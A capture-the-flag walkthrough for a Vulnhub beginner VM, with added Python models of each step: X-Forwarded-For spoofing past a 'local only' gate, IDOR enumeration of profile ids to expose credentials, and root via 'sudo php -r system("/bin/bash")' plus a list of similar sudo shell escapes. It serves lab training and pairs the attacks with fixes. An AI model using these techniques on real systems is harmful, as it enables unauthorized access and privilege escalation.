Vulnhub lab: Me and My Girlfriend study notes

Target VM download: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

Description: This VM tells us that there is a couple of lovers, Alice and Bob. The couple was originally very romantic, but since Alice started working at a private company, "Ceban Corp", something about Alice's attitude towards Bob has changed, as if something is "hidden". Bob asks for your help to get what Alice is hiding and gain full access to the company!

Difficulty Level: Beginner

Notes: there are 2 flag files

Learning: Web Application | Simple Privilege Escalation

 

1: Scan for live hosts

nmap -sS -Pn 192.168.158.0/24

-sS: SYN scan (half-open); the TCP three-way handshake is never completed

-sT: full TCP connect scan (completes the three-way handshake)

-Pn: skip host discovery and treat every target as up. -sP (now spelled -sn) is a ping scan that relies on ICMP echo requests, which firewalls often drop, so use -Pn when the target blocks ping.

nmap -T4 -A -v -p 1-65535 192.168.232.131

Detailed scan of all 65535 TCP ports (-A adds OS and version detection, the default NSE scripts and traceroute) to check whether anything beyond the web server is open.

Opening the web page shows a message that the site can only be accessed locally, so the login form cannot be used directly.

Ways to make a request look local: spoof the client address through headers such as Referer or X-Forwarded-For, which a badly written check may read instead of the real remote address.

The page source contains a hint recommending X-Forwarded-For.

Add an X-Forwarded-For header carrying a local address (127.0.0.1) to the request.

The main page now loads.
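The following is an added example, not code from the VM or from this write-up: the VM's PHP is not shown on the page, so the "naive" check below is an assumed reconstruction of the usual pattern (compare a client-supplied header with 127.0.0.1) placed beside a hardened version that only honours X-Forwarded-For from a known proxy. TRUSTED_PROXIES, the attacker address and the sample requests are constructed.

```python
# Added example, not code from the VM or the write-up: a model of the "local
# access only" gate and why a client-supplied X-Forwarded-For defeats it.
# The VM's real PHP is not on the page; the naive check is an assumed
# reconstruction. TRUSTED_PROXIES and the sample requests are constructed.
from ipaddress import ip_address

LOCAL_ADDRS = {"127.0.0.1", "::1"}
TRUSTED_PROXIES = {"10.0.0.5"}  # assumed: the only reverse proxy allowed to set XFF


def client_ip_naive(remote_addr, headers):
    """Weak pattern: if X-Forwarded-For is present, believe it over the socket peer."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()  # leftmost hop = whatever the client typed
    return remote_addr


def is_local_naive(remote_addr, headers):
    return client_ip_naive(remote_addr, headers) in LOCAL_ADDRS


def client_ip_hardened(remote_addr, headers):
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, and then
    take the rightmost entry, which that proxy appended; anything further left
    was written by the client and cannot be trusted."""
    if remote_addr in TRUSTED_PROXIES:
        hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
        if hops:
            return hops[-1]
    return remote_addr


def is_local_hardened(remote_addr, headers):
    try:
        return ip_address(client_ip_hardened(remote_addr, headers)).is_loopback
    except ValueError:
        return False  # garbage in the header is not a local client


def bypass_headers():
    """The header added in Burp: the gate wants a local address, so claim 127.0.0.1."""
    return {"X-Forwarded-For": "127.0.0.1"}


if __name__ == "__main__":
    attacker = "192.168.232.1"  # constructed attacker address on the lab network
    print("naive gate, spoofed XFF:   ", is_local_naive(attacker, bypass_headers()))
    print("hardened gate, spoofed XFF:", is_local_hardened(attacker, bypass_headers()))
```

The fix is not to validate the header's format but to decide, from the TCP peer address, whether the header is allowed to exist at all; an application reachable directly from the network can never trust X-Forwarded-For.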

 

 

 

Next, scan for directories. Because every request must carry the X-Forwarded-For header, Burp Intruder was used here; Dirsearch is handier when no custom header is needed (it can also send one with its -H option). The wordlist used for brute-forcing is Dirsearch's own, found under its db directory. The scan turns up robots.txt.

robots.txt contains an Allow: entry. Allow and Disallow are only crawler directives and do not restrict access, so any path listed there is worth requesting directly. (A 405 response during brute-forcing means the request method is not allowed for that path, not that the path does not exist.)

Open the heyhoo.txt it points to.
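As an added example (not part of the write-up), the robots.txt step above as a small parser: it pulls every Allow/Disallow path out of a robots.txt file and turns it into a probe list that carries the X-Forwarded-For header this site demands. The robots.txt text, BASE_URL and the header value are constructed assumptions; only /heyhoo.txt is taken from the page.

```python
# Added example, not from the write-up: pull every path that robots.txt mentions
# and turn it into a probe list that carries the X-Forwarded-For header the site
# demands. The robots.txt text below is constructed; only /heyhoo.txt comes from
# the page. BASE_URL and the header value are assumptions.
from urllib.parse import urljoin

SAMPLE_ROBOTS = """# constructed sample, not the VM's real file
User-agent: *
Disallow: /admin/      # inline comment should be ignored
Disallow: /backup.zip
Allow: /heyhoo.txt
Disallow: /*.php$
Sitemap: http://192.168.232.131/sitemap.xml
"""
BASE_URL = "http://192.168.232.131/"
BYPASS_HEADERS = {"X-Forwarded-For": "127.0.0.1"}  # assumed: value the local-only gate expects


def robots_paths(text):
    """Return the unique Allow/Disallow paths in file order.
    Both directives are crawler hints, not access control, so both are recon leads."""
    seen, paths = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        path = value.strip()
        if key.strip().lower() in ("allow", "disallow") and path and path not in seen:
            seen.add(path)
            paths.append(path)
    return paths


def has_wildcard(path):
    """Patterns such as /*.php$ cannot be fetched literally."""
    return "*" in path or path.endswith("$")


def probe_plan(base_url, robots_text, headers):
    """Concrete (url, headers) pairs to request, one per fetchable path,
    each carrying a copy of the bypass header."""
    return [(urljoin(base_url, p), dict(headers))
            for p in robots_paths(robots_text) if not has_wildcard(p)]


if __name__ == "__main__":
    for url, hdrs in probe_plan(BASE_URL, SAMPLE_ROBOTS, BYPASS_HEADERS):
        print(url, hdrs)
```

Feed the resulting pairs to Burp Repeater or any HTTP client; the point is that Disallow entries are as interesting as Allow entries, since neither is enforced by the server.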

 

 

 

Back on the main page

there are login and register links; register a Kimmy account and log in.

After logging in, the request carries an id parameter (id=12). That suggests the application trusts this value to decide which account is shown, so changing it might give access to another account.

Open the Profile page with the request intercepted in Burp and change id to 1: the profile shown no longer belongs to Kimmy.

Brute-force the id value with Burp Intruder until Alice's profile appears; the profile page exposes her credentials.
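The id-changing steps above are an insecure direct object reference. As an added example (not the VM's code), the block below models the profile endpoint with that flaw, the same endpoint with an ownership check, and the id-walking loop that Burp Intruder performs. USERS, the session and the passwords are constructed placeholders; they are not the VM's real ids or credentials.

```python
# Added example, not the VM's code: a model of the profile endpoint with the IDOR
# the walkthrough exploits, the same endpoint with an object-level authorization
# check, and the id-walking loop that Burp Intruder performs. USERS, the session
# and the passwords are constructed placeholders, not the VM's real data.

# constructed user table (the VM's real ids, names and passwords are not reproduced)
USERS = {
    1: {"username": "bob", "password": "pw-one"},
    5: {"username": "alice", "password": "pw-five"},
    12: {"username": "Kimmy", "password": "pw-twelve"},
}
KIMMY_SESSION = {"user_id": 12}  # the account we registered ourselves


def profile_vulnerable(session, params):
    """Trusts the user_id query parameter: any authenticated user can read any profile."""
    uid = int(params.get("user_id", session["user_id"]))
    return USERS.get(uid)


def profile_fixed(session, params):
    """Same endpoint with an ownership check: the requested id must be the caller's
    own id, otherwise the request is refused (None stands for a 403)."""
    uid = int(params.get("user_id", session["user_id"]))
    if uid != session["user_id"]:
        return None
    return USERS.get(uid)


def walk_ids(handler, session, id_range):
    """What Intruder does with a sniper payload on user_id: try each value and
    keep the ones that returned a profile. Returns {id: username}."""
    hits = {}
    for uid in id_range:
        profile = handler(session, {"user_id": str(uid)})
        if profile is not None:
            hits[uid] = profile["username"]
    return hits


def find_user(handler, session, wanted, id_range):
    """Return (id, password) for the profile whose username matches, or None.
    Mirrors reading the credentials off the exposed profile page."""
    for uid in id_range:
        profile = handler(session, {"user_id": str(uid)})
        if profile is not None and profile["username"].lower() == wanted.lower():
            return uid, profile["password"]
    return None


if __name__ == "__main__":
    print("vulnerable:", walk_ids(profile_vulnerable, KIMMY_SESSION, range(1, 20)))
    print("fixed:     ", walk_ids(profile_fixed, KIMMY_SESSION, range(1, 20)))
    print("alice via IDOR:", find_user(profile_vulnerable, KIMMY_SESSION, "alice", range(1, 20)))
```

The fix is the single comparison in profile_fixed: the id used to look up the record must come from, or be checked against, the server-side session, never only from the request.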

 

 

 

Log in to the target machine with Alice's username and password and read flag1.

That is the first flag; now try to escalate to root for the second one.

Run sudo -l to list the commands this user may run through sudo.

The output shows that alice may run php as root with the NOPASSWD tag, so no password is asked for. (Even without NOPASSWD, sudo would only ask for alice's own password, which we already have.)

Use the interpreter to spawn a shell:

sudo php -r 'system("/bin/bash");'

This drops into a root shell.
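As an added example (not from the write-up), the sudo -l step above turned into a small checker: it parses sudo -l output and flags entries whose binary is a known shell escape, printing the escape command for each. SAMPLE_SUDO_L is constructed; the only fact taken from the page is that alice can run php as root without a password. The escape commands in SHELL_ESCAPES are the standard ones for those binaries.

```python
# Added example, not from the write-up: parse `sudo -l` output and flag entries
# that hand out a root shell through an interpreter or pager, with the escape
# command for each. SAMPLE_SUDO_L is constructed; the only fact taken from the
# page is that alice can run php as root without a password.
import re

SAMPLE_SUDO_L = """Matching Defaults entries for alice on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on target:
    (root) NOPASSWD: /usr/bin/php
    (ALL) /usr/bin/less
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# binaries that spawn a shell when run under sudo; right side is the escape
SHELL_ESCAPES = {
    "php": "sudo php -r 'system(\"/bin/bash\");'",
    "python": "sudo python -c 'import os; os.system(\"/bin/bash\")'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/bash\")'",
    "perl": "sudo perl -e 'exec \"/bin/bash\";'",
    "less": "sudo less /etc/profile   then type  !/bin/bash",
}

# (runas) [TAG: ...] command
ENTRY_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Return one dict per command line after 'may run the following commands'."""
    entries, in_cmds = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds or not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        entries.append({"runas": m.group("runas"), "nopasswd": "NOPASSWD" in tags,
                        "cmd": m.group("cmd")})
    return entries


def shell_escapes(text):
    """Entries whose command is a bare binary from SHELL_ESCAPES. A bare binary in
    sudoers permits arbitrary arguments, which is exactly what the escapes need;
    an entry with fixed arguments (like the systemctl line) is not flagged."""
    findings = []
    for e in parse_sudo_l(text):
        words = e["cmd"].split()
        binary = words[0].rsplit("/", 1)[-1]
        if len(words) == 1 and binary in SHELL_ESCAPES:
            findings.append({**e, "binary": binary, "escape": SHELL_ESCAPES[binary]})
    return findings


if __name__ == "__main__":
    for f in shell_escapes(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"{f['binary']} as ({f['runas']}), {tag}: {f['escape']}")
```

From the defender's side the same parse tells you which sudoers lines to remove: granting an interpreter to a user is equivalent to granting a root shell, whatever the intended use was.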

 

 

 

 

Thinking:

I was stuck on heyhoo.txt for a long time, trying to work out how to upload a shell, and got nowhere, so I tried going through the login instead, which worked. The heyhoo.txt route should still be usable, and I need to keep thinking about how to use it. My tool skills are also not polished enough and need more practice.

Nmap option reference used for part of this: https://www.cnblogs.com/nmap/p/6232969.html

Tutorial to consult when you have no idea: https://www.freebuf.com/articles/others-articles/227157.html


Source: www.cnblogs.com/SonnyYeung/p/12677469.html